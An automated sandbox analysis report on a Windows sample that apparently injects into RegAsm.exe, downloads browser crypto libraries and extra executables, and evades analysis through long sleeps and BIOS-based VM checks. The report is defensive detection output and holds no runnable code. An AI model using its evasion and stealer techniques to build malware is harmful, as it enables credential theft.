Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0041616A

PE file contains an invalid checksum

Source: KJKJJJECFI.exe.2.dr	Static PE information: real checksum: 0x32c4e should be: 0x31538
Source: sql[1].dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x263795
Source: file.exe	Static PE information: real checksum: 0x2f063 should be: 0x3d94c
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr	Static PE information: real checksum: 0x32c4e should be: 0x31538
Source: KKJEBAAECB.exe.2.dr	Static PE information: real checksum: 0x511fe should be: 0x5fee9
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Static PE information: real checksum: 0x511fe should be: 0x5fee9

PE file contains sections with non-standard names

Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: sql[1].dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AA05 push ecx; ret	2_2_0041AA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FB536 push ecx; ret	2_2_6C0FB549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043504B push ss; retf	9_2_0043504F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAB3C51 push es; retf	12_2_1DAB3C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB1DB66 push esp; retf	12_2_1DB1DB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB1D561 push esp; retf	12_2_1DB1D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB2F456 push ebx; ret	12_2_1DB2F457

Source: file.exe	Static PE information: section name: .text entropy: 7.988086899463732
Source: KKJEBAAECB.exe.2.dr	Static PE information: section name: .text entropy: 7.99530141513891
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Static PE information: section name: .text entropy: 7.99530141513891
Source: KJKJJJECFI.exe.2.dr	Static PE information: section name: .text entropy: 7.988564984813096
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr	Static PE information: section name: .text entropy: 7.988564984813096

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KKJEBAAECB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KJKJJJECFI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KKJEBAAECB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KJKJJJECFI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0041616A

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: 840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 8.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 5228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe TID: 5084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1272	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe TID: 5408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4080	Thread sleep count: 90 > 30	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	12_2_004013B4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_0041391C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040EA64 GetSystemInfo,wsprintfA,

2_2_0040EA64

